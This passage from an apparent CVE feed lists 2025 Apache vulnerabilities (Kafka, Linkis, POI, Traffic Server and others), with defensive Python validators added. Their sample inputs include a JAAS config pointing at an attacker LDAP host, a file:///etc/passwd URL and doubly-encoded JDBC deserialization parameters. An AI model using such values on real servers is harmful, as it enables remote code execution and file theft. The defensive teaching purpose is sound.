134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27818

A possible security vulnerability has been identified in Apache Kafka. It requires AlterConfigs access to the cluster resource, or access to a Kafka Connect worker with the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0). When configuring the broker via config file or AlterConfig command, or a connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.LdapLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. An attacker can cause unrestricted deserialization of untrusted data, or RCE, when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.9.1/4.0.0, a system property ("-Dorg.apache.kafka.disallowed.login.modules") has been added to disable the problematic login modules in SASL JAAS configuration. Also, by default "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" are disabled in Apache Kafka Connect 3.9.1/4.0.0. Kafka users are advised to validate connector configurations and only allow trusted LDAP configurations.
Also examine connector dependencies for vulnerable versions and either upgrade the connectors, upgrade the specific dependency, or remove the connectors as remediation options. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27819

In CVE-2023-25194, an RCE/denial of service attack via SASL JAAS JndiLoginModule configuration in the Kafka Connect API was announced. Not only the Kafka Connect API is vulnerable to this attack; the Apache Kafka brokers also have this vulnerability. To exploit it, the attacker needs to be able to connect to the Kafka cluster and have the AlterConfigs permission on the cluster resource. Since Apache Kafka 3.4.0, a system property ("-Dorg.apache.kafka.disallowed.login.modules") has been added to disable the problematic login modules in SASL JAAS configuration. Also, by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0, and "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" is disabled by default in Apache Kafka 3.9.1/4.0.0.
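The three Kafka entries above (CVE-2025-27817, CVE-2025-27818 and CVE-2025-27819) come down to two controls on configuration that an untrusted party may supply: a denylist of JAAS login modules and an allowlist of OAUTHBEARER endpoint URLs. Kafka enforces these through the org.apache.kafka.disallowed.login.modules and org.apache.kafka.sasl.oauthbearer.allowed.urls system properties; the following is an added example, not Apache Kafka code, that models the same checks as a standalone validator for a connector config submitted over the Connect REST API. The sample configs are constructed and the JAAS parsing is a simplification (it reads the login module class as the first token of each entry).

```python
"""Validator for untrusted Kafka client configuration: disallowed JAAS
login modules and non-allowlisted OAUTHBEARER URLs.  Added example;
not Apache Kafka code."""

import re
from urllib.parse import urlsplit

# Modules Kafka disables by default since 3.9.1/4.0.0 (per the advisory).
DISALLOWED_LOGIN_MODULES = {
    "com.sun.security.auth.module.JndiLoginModule",
    "com.sun.security.auth.module.LdapLoginModule",
}
JAAS_KEYS = ("sasl.jaas.config",
             "producer.override.sasl.jaas.config",
             "consumer.override.sasl.jaas.config",
             "admin.override.sasl.jaas.config")
URL_KEYS = ("sasl.oauthbearer.token.endpoint.url",
            "sasl.oauthbearer.jwks.endpoint.url")

# A JAAS entry is "<module class> <flag> [options...];"
_MODULE_RE = re.compile(
    r"([\w.$]+)\s+(required|requisite|sufficient|optional)\b", re.I)


def login_modules(jaas_config):
    """Login module classes named in a JAAS config string."""
    return [m.group(1) for m in _MODULE_RE.finditer(jaas_config)]


def validate_config(config, allowed_urls):
    """Return (key, reason) pairs for every setting that must be refused.
    URLs must be https and appear in allowed_urls (an empty allowlist,
    the 4.0.0 default, refuses every URL)."""
    violations = []
    for key, value in config.items():
        if key in JAAS_KEYS or key.endswith(".override.sasl.jaas.config"):
            for module in login_modules(value):
                if module in DISALLOWED_LOGIN_MODULES:
                    violations.append((key, "disallowed login module " + module))
        elif key.endswith(URL_KEYS):
            if urlsplit(value).scheme != "https":
                violations.append((key, "non-https url " + value))
            elif value not in allowed_urls:
                violations.append((key, "url not in allowlist " + value))
    return violations


# Constructed sample connector configs.
ALLOWED_URLS = {"https://sso.internal.example/token",
                "https://sso.internal.example/jwks"}
GOOD_CONFIG = {
    "connector.class": "FileStreamSinkConnector",
    "sasl.jaas.config": 'org.apache.kafka.common.security.plain.PlainLoginModule '
                        'required username="svc" password="x";',
    "sasl.oauthbearer.token.endpoint.url": "https://sso.internal.example/token",
}
BAD_CONFIG = {
    "connector.class": "FileStreamSinkConnector",
    "producer.override.sasl.jaas.config":
        'com.sun.security.auth.module.LdapLoginModule required '
        'userProvider="ldap://attacker.example:1389/o=x" useSSL=false;',
    "sasl.oauthbearer.jwks.endpoint.url": "file:///etc/passwd",
}

if __name__ == "__main__":
    for key, reason in validate_config(BAD_CONFIG, ALLOWED_URLS):
        print(key, "->", reason)
```

The validator refuses on scheme before it consults the allowlist, so a file:// or http:// URL is rejected even when someone has mistakenly added it to the allowed set. The override keys are matched by suffix because Connect accepts them for producer, consumer and admin clients alike.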

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27820

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache httpclient *
netapp ontap_tools 10
CVE-2025-27821

Out-of-bounds Write vulnerability in Apache Hadoop HDFS native client. This issue affects Apache Hadoop: from 3.2.0 before 3.4.2. Users are recommended to upgrade to version 3.4.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache hadoop *
CVE-2025-27867

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Felix HTTP Webconsole Plugin. This issue affects Apache Felix HTTP Webconsole Plugin: from Version 1.X through 1.2.0. Users are recommended to upgrade to version 1.2.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache felix_http_webconsole_plugin *
CVE-2025-27888

Severity: medium (5.8) / important Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Druid. This issue affects all previous Druid versions. When using the Druid management proxy, a request that has a specially crafted URL could be used to redirect the request to an arbitrary server instead. This has the potential for XSS or XSRF. The user is required to be authenticated for this exploit. The management proxy is enabled in Druid's out-of-box configuration. It may be disabled to mitigate this vulnerability. If the management proxy is disabled, some web console features will not work properly, but core functionality is unaffected. Users are recommended to upgrade to Druid 31.0.2 or Druid 32.0.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache druid *
CVE-2025-29847

A vulnerability in Apache Linkis. Problem description: when using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass allows unauthorized access to system files via JDBC parameters. Scope of impact: this issue affects Apache Linkis: from 1.3.0 through 1.7.0. Severity level: moderate. Solution: repeatedly check whether the connection information contains the "%" character and, if it does, URL-decode it before validating. Users are recommended to upgrade to version 1.8.0, which fixes the issue. More questions about this vulnerability can be discussed here: https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve
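The fix the Linkis advisory describes (decode while "%" remains, then validate) is the same pattern the Apache InLong entries above (CVE-2025-27526 and CVE-2025-27528) needed against URL-encoding and backspace bypasses. The following is an added example, not Apache Linkis or InLong code, that checks a JDBC connection string the naive way and the hardened way. The blocked parameter names are MySQL Connector/J options commonly abused for file read and deserialization; which ones to block is a deployment decision, and the sample URLs are constructed.

```python
"""Fixed-point URL decoding of a JDBC connection string before
validating its parameters, modelled on CVE-2025-29847.  Added example;
not Apache Linkis code."""

from urllib.parse import parse_qsl, unquote

MAX_DECODE_ROUNDS = 8
# Assumed blocklist of MySQL Connector/J options (lower-cased).
BLOCKED_PARAMS = {"allowloadlocalinfile", "allowurlinlocalinfile",
                  "autodeserialize"}


def decode_fully(value):
    """Decode while the string still changes.  A '%' that survives
    decoding is a literal percent sign and is left alone."""
    current = value
    for _ in range(MAX_DECODE_ROUNDS):
        if "%" not in current:
            return current
        nxt = unquote(current)
        if nxt == current:
            return current
        current = nxt
    raise ValueError("too many URL-encoding layers")


def naive_check(jdbc_url):
    """Vulnerable: searches the raw string for blocked names, so one
    extra layer of encoding hides them."""
    raw = jdbc_url.lower()
    return not any(p in raw for p in BLOCKED_PARAMS)


def hardened_check(jdbc_url):
    """Decode to a fixed point, refuse control characters (backspace
    tricks), then parse the query and compare names case-insensitively."""
    decoded = decode_fully(jdbc_url)
    if any(ord(c) < 0x20 for c in decoded):
        return False
    _, _, query = decoded.partition("?")
    for name, _ in parse_qsl(query, keep_blank_values=True):
        if name.strip().lower() in BLOCKED_PARAMS:
            return False
    return True


# Constructed sample connection strings.
CLEAN = "jdbc:mysql://db.internal:3306/app?useSSL=true"
PLAIN = "jdbc:mysql://db.internal:3306/app?autoDeserialize=true"
DOUBLE = "jdbc:mysql://db.internal:3306/app?%2561utoDeserialize=true"
BACKSPACE = "jdbc:mysql://db.internal:3306/app?auto%08Deserialize=true"

if __name__ == "__main__":
    for url in (CLEAN, PLAIN, DOUBLE, BACKSPACE):
        print(naive_check(url), hardened_check(url), url)
```

"%2561" decodes to "%61" and then to "a", so the raw string never contains "autoDeserialize" and the substring check passes; only the decoded, parsed form exposes the parameter. The control-character rule covers the backspace variant, where the dangerous name is assembled only after the bytes reach a component that honours the character.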

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2025-29953

Deserialization of Untrusted Data vulnerability in Apache ActiveMQ NMS OpenWire Client. This issue affects Apache ActiveMQ NMS OpenWire Client before 2.1.1 when performing connections to untrusted servers. Such servers could abuse the unbounded deserialization in the client to provide malicious responses that may eventually cause arbitrary code execution on the client. Version 2.1.0 introduced an allow/denylist feature to restrict deserialization, but this feature could be bypassed. The .NET team has deprecated the built-in .NET binary serialization feature starting with .NET 9 and suggests migrating away from binary serialization. The project is considering following suit and dropping this part of the NMS API altogether. Users are recommended to upgrade to version 2.1.1, which fixes the issue. Migrating away from relying on .NET binary serialization is also recommended as a hardening measure for the future.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache activemq_nms_openwire *
CVE-2025-30001

Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-30065

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code. Users are recommended to upgrade to version 1.15.1, which fixes the issue.

Products Affected

Vendor Product Version
apache parquet_java *
CVE-2025-30474

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons VFS. The FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message. This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_vfs *
CVE-2025-30675

In Apache CloudStack, a flaw in access control affects the listTemplates and listIsos APIs. A malicious Domain Admin or Resource Admin can exploit this issue by intentionally specifying the 'domainid' parameter along with the 'filter=self' or 'filter=selfexecutable' values. This allows the attacker to gain unauthorized visibility into templates and ISOs under the ROOT domain. A malicious admin can enumerate and extract metadata of templates and ISOs that belong to unrelated domains, violating isolation boundaries and potentially exposing sensitive or internal configuration details.  This vulnerability has been fixed by ensuring the domain resolution strictly adheres to the caller's scope rather than defaulting to the ROOT domain. Affected users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L 1.2 3.4

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-30676

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.19. Users are recommended to upgrade to version 18.12.19, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-30677

Apache Pulsar contains multiple connectors for integrating with Apache Kafka. The Pulsar IO Apache Kafka Source Connector, Sink Connector, and Kafka Connect Adaptor Sink Connector log sensitive configuration properties in plain text in application logs. This vulnerability can lead to unintended exposure of credentials in log files, potentially allowing attackers with access to these logs to obtain Apache Kafka credentials. The vulnerability's impact is limited by the fact that an attacker would need access to the application logs to exploit this issue. This issue affects Apache Pulsar IO's Apache Kafka connectors in all versions before 3.0.11, 3.3.6, and 4.0.4. 3.0.x version users should upgrade to at least 3.0.11. 3.3.x version users should upgrade to at least 3.3.6. 4.0.x version users should upgrade to at least 4.0.4. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache pulsar *
CVE-2025-31650

Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request, which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service. This issue affects Apache Tomcat: from 9.0.76 through 9.0.102, from 10.1.10 through 10.1.39, from 11.0.0-M2 through 11.0.5. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.90 through 8.5.100. Users are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2025-31651

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.5, from 10.1.0-M1 through 10.1.39, from 9.0.0.M1 through 9.0.102. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version [FIXED_VERSION], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-31672

Improper Input Validation vulnerability in Apache POI. The issue affects the parsing of OOXML format files like xlsx, docx and pptx. These file formats are basically zip files and it is possible for malicious users to add zip entries with duplicate names (including the path) in the zip. In this case, products reading the affected file could read different data because 1 of the zip entries with the duplicate name is selected over another but different products may choose a different zip entry. This issue affects Apache POI poi-ooxml before 5.4.0. poi-ooxml 5.4.0 has a check that throws an exception if zip entries with duplicate file names are found in the input file. Users are recommended to upgrade to version poi-ooxml 5.4.0, which fixes the issue. Please read https://poi.apache.org/security.html for recommendations about how to use the POI libraries securely.
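The duplicate-entry problem above is easy to reproduce: a zip can legitimately carry two central-directory records with the same name, and each reader picks one. The following is an added example, not Apache POI code, that builds such a container in memory, shows which copy Python's own zipfile silently chooses, and applies the check the advisory says poi-ooxml 5.4.0 adds (reject the file outright when names repeat). The entry names and contents are constructed.

```python
"""Reject OOXML containers whose zip directory repeats an entry name,
the check described for CVE-2025-31672.  Added example; not Apache POI
code."""

import io
import warnings
import zipfile


def build_zip_with_duplicate():
    """Constructed xlsx-like container with xl/workbook.xml twice."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")     # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("[Content_Types].xml", "<Types/>")
            zf.writestr("xl/workbook.xml", "<workbook>first</workbook>")
            zf.writestr("xl/workbook.xml", "<workbook>second</workbook>")
    return buf.getvalue()


def build_clean_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook>only</workbook>")
    return buf.getvalue()


def duplicate_entry_names(data):
    """Names that occur more than once in the central directory."""
    seen, dups = set(), []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename in seen and info.filename not in dups:
                dups.append(info.filename)
            seen.add(info.filename)
    return dups


def open_strict(data):
    """Open only if every entry name is unique; otherwise refuse."""
    dups = duplicate_entry_names(data)
    if dups:
        raise ValueError("duplicate zip entries: " + ", ".join(dups))
    return zipfile.ZipFile(io.BytesIO(data))


def strict_rejects(data):
    try:
        open_strict(data).close()
        return False
    except ValueError:
        return True


def what_a_lenient_reader_sees(data):
    """Python's zipfile keeps the last directory record for a name;
    another library may keep the first.  Same bytes, different document."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read("xl/workbook.xml").decode()


if __name__ == "__main__":
    data = build_zip_with_duplicate()
    print(duplicate_entry_names(data), what_a_lenient_reader_sees(data))
    print("rejected:", strict_rejects(data))
```

The point of rejecting rather than picking a copy is that the choice cannot be made consistently across products: whichever record a scanner inspects, a different consumer may render the other one.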

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache poi *
CVE-2025-31698

ACL configured in ip_allow.config or remap.config does not use IP addresses that are provided by PROXY protocol. Users can use a new setting (proxy.config.acl.subjects) to choose which IP addresses to use for the ACL if Apache Traffic Server is configured to accept PROXY protocol. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.6, from 9.0.0 through 9.2.10. Users are recommended to upgrade to version 9.2.11 or 10.0.6, which fixes the issue.
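Behind a load balancer that speaks PROXY protocol, the TCP peer of every connection is the balancer itself, so an ACL that judges the peer address sees only a trusted internal IP. The following is an added example, not Apache Traffic Server code, that parses a PROXY protocol v1 header and shows an allow-list evaluated against the peer (the vulnerable behaviour) beside one evaluated against the client address the header carries. The subject names PEER and PROXY illustrate the idea of proxy.config.acl.subjects, not its actual syntax; the addresses and rules are constructed.

```python
"""Which address an ACL judges when connections arrive via PROXY
protocol, modelled on CVE-2025-31698.  Added example; not Apache
Traffic Server code."""

import ipaddress


def parse_proxy_v1(line):
    """Parse a PROXY protocol v1 header line, e.g.
    'PROXY TCP4 203.0.113.7 10.0.0.5 51234 443\\r\\n'.
    Returns (src_ip, dst_ip), or None for 'PROXY UNKNOWN'."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) < 2 or parts[0] != "PROXY":
        raise ValueError("not a PROXY v1 header")
    if parts[1] == "UNKNOWN":
        return None
    if parts[1] not in ("TCP4", "TCP6") or len(parts) != 6:
        raise ValueError("malformed PROXY v1 header")
    return ipaddress.ip_address(parts[2]), ipaddress.ip_address(parts[3])


def acl_subject(peer_ip, proxy_header, subjects=("PROXY", "PEER")):
    """Pick the IP the ACL should judge.  'PROXY' is the client address
    carried in the header, 'PEER' the TCP peer (the load balancer).
    Subjects are tried in order; the first one available wins."""
    proxied = parse_proxy_v1(proxy_header) if proxy_header else None
    for subject in subjects:
        if subject == "PROXY" and proxied is not None:
            return proxied[0]
        if subject == "PEER":
            return ipaddress.ip_address(peer_ip)
    raise ValueError("no usable ACL subject")


def allowed(ip, rules):
    """rules: ordered (network, action) pairs; first match wins,
    default deny."""
    for net, action in rules:
        if ip in ipaddress.ip_network(net):
            return action == "allow"
    return False


# Constructed scenario: internal networks allowed, everything else denied,
# a load balancer at 10.0.0.9 forwarding an Internet client.
RULES = [("10.0.0.0/8", "allow"), ("0.0.0.0/0", "deny")]
LB_PEER = "10.0.0.9"
HEADER = "PROXY TCP4 203.0.113.7 10.0.0.5 51234 443\r\n"


def vulnerable_decision():
    """ACL sees only the TCP peer, so every proxied client looks internal."""
    return allowed(acl_subject(LB_PEER, HEADER, subjects=("PEER",)), RULES)


def fixed_decision():
    """ACL sees the PROXY-protocol client address first."""
    return allowed(acl_subject(LB_PEER, HEADER, subjects=("PROXY", "PEER")), RULES)


if __name__ == "__main__":
    print("peer-based:", vulnerable_decision(), " proxy-based:", fixed_decision())
```

Trusting the PROXY header only makes sense when the peer is itself a known balancer; a server that accepts PROXY protocol from arbitrary peers lets any client claim any source address, so the two subjects are complementary rather than interchangeable.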

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2025-32896

Summary: unauthorized users can perform arbitrary file read and deserialization attacks by submitting a job through the RESTful API v1. Details: unauthorized users can access `/hazelcast/rest/maps/submit-job` to submit a job, and an attacker can set extra parameters in the MySQL JDBC URL to perform arbitrary file read and deserialization attacks. This issue affects Apache SeaTunnel: <=2.3.10. Fixed: users are recommended to upgrade to version 2.3.11 and to enable RESTful API v2 with HTTPS two-way (mutual TLS) authentication, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache seatunnel *
CVE-2025-32897

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This security vulnerability is the same as CVE-2024-47552, but the version range described in the CVE-2024-47552 definition is too narrow. This issue affects Apache Seata (incubating): from 2.0.0 before 2.3.0. Severity Justification: The Apache Seata security team assesses the severity of this vulnerability as "Low" due to stringent real-world mitigating factors. First, the vulnerability is strictly isolated to the Raft cluster mode, an optional and non-default feature introduced in v2.0.0, while most users rely on the unaffected traditional architecture. Second, Seata is an internal middleware; communication between TC and RM/TM occurs entirely within trusted internal networks. An attacker would require prior, unauthorized access to the Intranet to exploit this, making external exploitation highly improbable. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata *
CVE-2025-33042

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Avro Java SDK when generating specific records from untrusted Avro schemas. This issue affects Apache Avro Java SDK: all versions through 1.11.4 and version 1.12.0. Users are recommended to upgrade to version 1.12.1 or 1.11.5, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache avro 1.12.0
apache avro *
CVE-2025-35003

Improper Restriction of Operations within the Bounds of a Memory Buffer and Stack-based Buffer Overflow vulnerabilities were discovered in Apache NuttX RTOS Bluetooth Stack (HCI and UART components) that may result in system crash, denial of service, or arbitrary code execution, after receiving maliciously crafted packets. NuttX's Bluetooth HCI/UART stack users are advised to upgrade to version 12.9.0, which fixes the identified implementation issues. This issue affects Apache NuttX: from 7.25 before 12.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-3891

A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
secalert@redhat.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
redhat enterprise_linux 7.0
apache http_server -
redhat enterprise_linux 9.0
redhat enterprise_linux 8.0
debian debian_linux 11.0
CVE-2025-46392

Uncontrolled Resource Consumption vulnerability in Apache Commons Configuration 1.x. There are a number of issues in Apache Commons Configuration 1.x that allow excessive resource consumption when loading untrusted configurations or using unexpected usage patterns. The Apache Commons Configuration team does not intend to fix these issues in 1.x. Apache Commons Configuration 1.x is still safe to use in scenarios where you only load trusted configurations. Users that load untrusted configurations or give attackers control over usage patterns are recommended to upgrade to the 2.x version line, which fixes these issues. Apache Commons Configuration 2.x is not a drop-in replacement, but as it uses a separate Maven groupId and Java package namespace they can be loaded side-by-side, making it possible to do a gradual migration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache commons_configuration *
CVE-2025-46548

If you enable Basic Authentication in Pekko Management using the Java DSL, the authenticator may not be properly applied. Users that rely on authentication instead of making sure the Management API ports are only available to trusted users are recommended to upgrade to version 1.1.1, which fixes this issue. Akka was affected by the same issue and has released the fix in version 1.6.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache pekko_management *
akka akka_management *
CVE-2025-46647

A vulnerability of plugin openid-connect in Apache APISIX. This vulnerability will only have an impact if all of the following conditions are met:
1. The openid-connect plugin is used with introspection mode.
2. The auth service connected to openid-connect provides services to multiple issuers.
3. Multiple issuers share the same private key and rely only on the issuer being different.
If affected by this vulnerability, it would allow an attacker with a valid account on one of the issuers to log into the other issuer. This issue affects Apache APISIX: until 3.12.0. Users are recommended to upgrade to version 3.12.0 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.6 3.6

Products Affected

Vendor Product Version
